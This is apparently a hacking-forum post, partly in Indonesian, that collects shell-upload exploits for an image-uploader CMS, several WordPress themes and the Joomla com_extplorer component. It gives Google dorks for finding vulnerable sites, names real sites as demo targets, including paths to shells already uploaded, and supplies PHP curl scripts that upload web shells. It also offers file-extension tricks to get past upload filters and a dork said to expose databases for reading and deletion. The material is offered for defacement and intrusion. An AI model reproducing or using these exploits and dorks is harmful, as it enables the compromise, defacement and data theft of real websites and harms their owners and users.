"CMS admin Image Uploader" Shell Upload Vulnerability
Google Dorks:
inurl: "default_image.asp"
inurl: "default_imagen.asp"
inurl: "/ box_image.htm"
Anda akan mendapat pilihan unggah setelah mengklik link yang Anda punya dengan menggunakan Dorks.
Sekarang pilih deface Anda, atau shell dan upload Big Grin
Format:
shell.asp,. jpg, shell.php;.. html php jpg, gif, jpg, png, pdf, zip......
Anda dapat menggunakan data Tamper juga ...
Live Demo:
http://www.pballcentral.com/admin% 5Cincl ... _image.asp
=====================================================
[#] Wordpress ..... brainstorming meng-upload shell [#]
permintaan:
1 º Shell: THA.php di tempat yang sama
2 º Buat file: inject.php (Jalankan secara online atau dengan xampp)
PHP code:
<?php
$uploadfile="THA.php";
$ch = curl_init("
http://target.com/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Google Dork:
inurl :/ wp-content/themes/brainstorm / situs:
Contoh target tanpa link edit:
http://www.kscm.ie/wp-content/themes/bra...?post_id=9
diubah:
/ wp-content/themes/brainstorm/scripts/piecemaker/piecemaker-xml.php? post_id = 9
untuk
/ wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php
Contoh Jumlah:
http://www.kscm.ie/wp-content/themes/bra...oadify.php
cari u shell di sini:
http://target/wp-content/uploads/year/month/THA.php
contoh
http://www.kscm.ie/wp-content/uploads/2013/08/THA.php
====================================================
WordPress GeoPlaces Themes (Upload shell exploit)
# Exploit Title: WordPress GeoPlaces Themes >> upload shell exploit
# Google Dork: "inurl:wp-content/themes/GeoPlaces/"
# Date: 2/6/2013
# Exploit Author: xmayaroos
# Vendor Homepage:
http://www.geotheme.com/
# Version: [app version - REQUIRED]
# Tested on: [relevant os]
# Greeting To : sec4ever members
/wp-content/themes/GeoPlaces/monetize/upload/
find your shell
/wp-content/uploads/2013/08 (Year / Month)
===================================================
Joomla com_extplorer Components shell upload Vulnerability
#################################
# ISlamic Republic Of Iran Security Team
#
http://Www.IrIsT.Ir
#################################
# Exploit Title : joomla com_extplorer Components shell upload Vulnerability
# Author : IrIsT Security & Researcher Team
# Discovered By : Am!r
# Home :
http://IrIsT.Ir -
http://IrIsT.Ir/forum
# Facebook Page :
http://www.facebook.com/pages/IrIsT-Hack...7267857573
# Software Link :
http://www.joomla.org
# Security Risk : High
# Tested on : Linux
# Dork : inurl:administrator/components/com_extplorer
#################################
Exploit :
Post.php
<?php
$uploadfile="Amir.php.gif";
$ch =
curl_init("
http://www.exemple.com/administrator/components/com_extplorer/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/images/stories/Amir.php.gif
#################################
# Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0
# sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous
# Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf - MedRiK - 4xp3r-bh - Sokout - mehdiv - soulz
# & All Members In IrIsT.Ir
#################################
#Tnx To : PacketstormSecurity.Org - 1337day.com - exploit-db.com
#################################
=============================================
Dork : allinurl:index.php?db=information_schema
Go
to google.com and enter this dork, google will show you About 161,000
results guess how many website are vulnerable for this attack !
This
dork bypasses the admin username and pass and takes You directly to
information schema tables to get data and You can delete data!!!!
===================================================
Wordpress theme GTD File Upload Vulnerability. #Google Dork: inurl:"/wp-content/themes/GTD/upload/" or allintext:"powered by WordPress. GTD theme by Templatic"
[+]exploit
-----------------------------------------------------------------------
example : http://localhost/wp-content/themes/GTD/upload/
Shell access: http://localhost/wp-content/themes/GTD/attachments/yourshell.php
Enjoy Brothers!
Translate sendiri !
Gue cuman share aja XD
Kalo dah dewo jangan lupa temen :D
Titip nick ./Shanjunisme98
Sumber : Exploit DB